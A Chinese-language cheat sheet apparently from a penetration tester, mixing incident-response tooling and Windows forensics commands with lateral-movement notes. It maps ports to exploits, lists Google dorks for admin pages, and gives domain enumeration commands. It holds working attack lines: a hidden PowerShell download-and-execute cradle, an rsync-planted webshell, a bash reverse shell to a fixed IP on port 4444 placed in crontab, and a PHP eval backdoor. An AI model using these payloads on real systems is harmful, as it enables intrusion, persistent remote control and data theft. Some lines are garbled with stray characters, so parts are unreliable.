对内网服务端口进行扫描,根据开放的端口服务选择横向的方法。
常见端口:
7001,80,8080,11211,6379,1099,1090,8088,9081,9080,9090,3306,1433,1521,5432,27017,8069,9200,9300,8161,50075,50070,873,5984
ftp服务 21 爆破密码
远程桌面 3389 爆破密码/pth
weblogic 7001、80 反序列化/控制台弱口令
zookeeper服务 2181 未授权访问
redis数据库 6379 未授权访问
Memcached服务 11211 未授权访问
RMI服务 1099、1090 反序列化
Docker Remote API 2375 未授权访问
tomcat 80、8080、8081... 控制台弱口令
websphere 080、9081、9090 反序列化
MySQL 3306 弱口令udfrce
mssql 1433 弱口令rce
Oracle 1521 弱口令
PostgerSQL 5432 弱口令
MongoDB 27017 弱口令/未授权访问
CouchDB 5984 未授权访问
Smtp协议 25 弱口令/未授权访问
Zabbix服务 8069 远程命令执行
Elasticsearch服务 92009300 未授权访问/远程命令执行
Axis2 8080 弱口令
Jboss 8080 反序列化/控制台弱口令
activeMQ 8161 文件上传
Hadoop 50075、50070 信息泄露/命令执行
sync服务 873 未授权访问
struts框架 80、8080 未授权访问
#应急工具
#病毒分析:
PCHunter:http://www.xuetr.com
Process Explorer:https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer
processhacker:https://processhacker.sourceforge.io/downloads.php
autoruns:https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
OTL:https://www.bleepingcomputer.com/download/otl/
#病毒查杀
卡巴斯基(推荐理由:绿色版、最新病毒库):
http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe
大蜘蛛(推荐理由:扫描快、一次下载只能用1周,更新病毒库):
http://free.drweb.ru/download+cureit+free
火绒安全软件:
360杀毒:
http://sd.360.cn/download_center.html
#病毒动态
CVERC-国家计算机病毒应急处理中心:http://www.cverc.org.cn
微步在线威胁情报社区:https://x.threatbook.cn
火绒安全论坛:http://bbs.huorong.cn/forum-59-1.html
爱毒霸社区:http://bbs.duba.net
腾讯电脑管家:http://bbs.guanjia.qq.com/forum-2-1.html
#在线病毒扫描网站
多引擎在线病毒扫描网 v1.02,当前支持 41 款杀毒引擎:
腾讯哈勃分析系统:
Jotti 恶意软件扫描系统:
针对计算机病毒、手机病毒、可疑文件等进行检测分析:
#Webshell查杀
D盾_Web查杀:
http://www.d99net.net/index.asp
河马 webshell 查杀:
深信服 Webshell 网站后门检测工具:
http://edr.sangfor.com.cn/backdoor_detection.html
Safe3:
http://www.uusec.com/webshell.zip
#window
powershell.exe -nop -w hidden -c "IEX ((new-objectnet.webclient).downloadstring('http://x.x.x.x:80/a'))"
#查看管理组(工具D盾|ProcessExplorer[电脑各种信息])
>net localgroup administrators
#查看非隐藏用户
>net user
#查看指定用户
>net user Guest
#创建隐藏账号 $结尾
>net user username$ pwd /add
#运通过本地用户和组的管理页面(或者“计算机管理”)的可以查看到隐藏账户:
>lusrmgr.msc
#删除隐藏用户
>net user username$ /del
#打开“系统信息功能”并依次点击“软件环境→正在运行任务”就可以查看到进程的详细信息,比如进程路径、进程 ID、文件创建日期、启动时间等:
>msinfo32
#查看开机启动项是否正常,特别注意如下三个注册表项:
\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Runonce
#检查组策略
#计算机配置-Windows设置-脚本(启动/关机)
#用户配置-Windows设置-脚本(登录/注销)
>gpedit.msc
#访问“计算机管理”功能,查看“任务计划程序库”,查看是否存在可疑的计划任务:
#检查计算机与网络上的其它计算机之间的会话或计划任务,如有,则确认是否为正常连接
>schtasks.exe
#查看系统版本以及补丁信息
>systeminfo
#排查当前用户最近打开文件
>%userprofile%\recent
#Windows 的C:\Windows\System32\winevt\Logs路径下存放了系统各类日志文件
#双击选中 “Securuty” 安全事件日志文件,可进入事件查看器(另一种办法是 Win+R 打开运行,输入“eventvwr.msc”,回车运行,直接打开“事件查看器”):
#LogParser 的一些用法(导出应用程序日志、安全日志、系统日志)
基本查询结构
Logparser.exe –i:EVT –o:DATAGRID "SELECT * FROM c:\xx.evtx"
查询登录成功的所有事件
LogParser.exe -i:EVT –o:DATAGRID "SELECT * FROM c:\Security.evtx where EventID=4624"
查询登录失败的所有事件
LogParser.exe -i:EVT –o:DATAGRID "SELECT * FROM c:\Security.evtx where EventID=4625"
查询系统历史开关机记录
LogParser.exe -i:EVT –o:DATAGRID "SELECT TimeGenerated,EventID,Message FROM c:\System.evtx where EventID=6005 or EventID=6006"
#其它
netstat -ano #查看所有网络连接及其PID
netstat -ano | findstr 443 #过滤特定端口的网络连接
netstat -ano | findstr TCP #过滤TCP连接
tasklist | findstr 18544 #查看PID为18544的进程
taskkill /F /pid 18544 #强制结束进程
#fscan64.exe
fscan64.exe -h 10.x.x.0/24 -o 10-x-x-C.txt
#nmap
nmap —script nfs-showmount IP
nmap -p 873 —script rsync-list-modules IP
#打开终端利用nmap扫描工具对目标主机进行扫描
nmap -sT -v -O 192.168.235.140
#扫描某个网段开通22端口的机器
nmap -p 22 172.16.10.*
#识别系统指纹信息(打开的端口,MAC地址,操作系统类型,内核版本)
nmap -O 172.16.10.125
#扫描出局域网中所有主机
netdiscover
#sqlmap
sqlmap -r 1.txt
#rsync
rsync rsync://ip:873
可以在本地写个shell而后执行命令 rsync -av shell.php rsync://ip:873/src/var/wwww
访问/src/etc/crontab定时任务目录
在本地写个.sh文件
#!/bin/bash /bin/bash -i >& /dev/tcp/192.168.182.199/4444 0>&1
#搜索语法 X是数字,比如23
inurl:asp?id=X
inurl /admin/login.php 公司
inurl /admin/login.jsp 公司
inurl /admin/login.html 公司
inurl /admin/login.asp 公司
jkl;'
info:商城 AND 积分商城
#御剑后台扫描工具
找到rar、jar、zip等后缀的文件,搞下来解压反编译查找可访问的文件和url
#yxcms后台配置模板
<?php eval($_POST["cmd"]);?>
# CS 的 Backdoor 在服务器上传后门工具
#弱口令扫描x-crack
Weak password scanner, Support: FTP/SSH/SNMP/MSSQL/MYSQL/PostGreSQL/REDIS/ElasticSearch/MONGODB
--- window ---
查询本机用户列表:net user
查询本机管理员(通常含有域用户): net localgroup administrators
查询域管理员用户:net group"domain admins"/domain
查询域用户:net user /domain
查询域里面的工作组: net group /domain
查询域名称:net view /domain
查询域内计算机:net view /domain:XX
查询域控制器:net time /domain
查询域管理员用户组: net localgroup administrators /domain
域用户添加到本机: net localgroup administrators workgroupluser001 /add
查看域控制器(如果有多台 ): net group"“Domain controllers"
查询本机 IP 段、所在域等:ipconfig /all
查询同一域内机器列表:net view
查询所有域控制器:dsquery server
搜索域内所有域控制器并显示其DNS主机名和站点名
查询域内机器名:dsquery computer
搜索域内名称以“admin”开头的前10台机器
dsquery computer domainroot -name admin* -limit 10
查询域用户:dsquery user
搜索域内名称以“admin”开头的前10个用户
dsquery user domainroot -name admin* -limit 10
查询域内联系人:dsquery contact
搜索域内名称以“admin”开头的前10个联系人
dsquery contact domainroot' -name admin*-limit 10
查询域内子网:dsquery subnet
查询域内用户组:dsquery group
搜索在DC-SUPER、DC-COM 域中的所有组
dsquery group dc-super,dc-com lmore
查询域内组织单位:dsquery ou
查询域内站点:dsquery site
搜索域中所有站点的名称
dsquery site -o rdn
查询域内所有计算机:net group"domain computers"/domain
查询超过 4 周未登录的计算机: dsquery computer -inactive 4查询超过4 周未登录的用户:dsquery user -inactive 4
通过组织单位查询计算机:dsquery computer"ou=xxdc-xx,dc=com
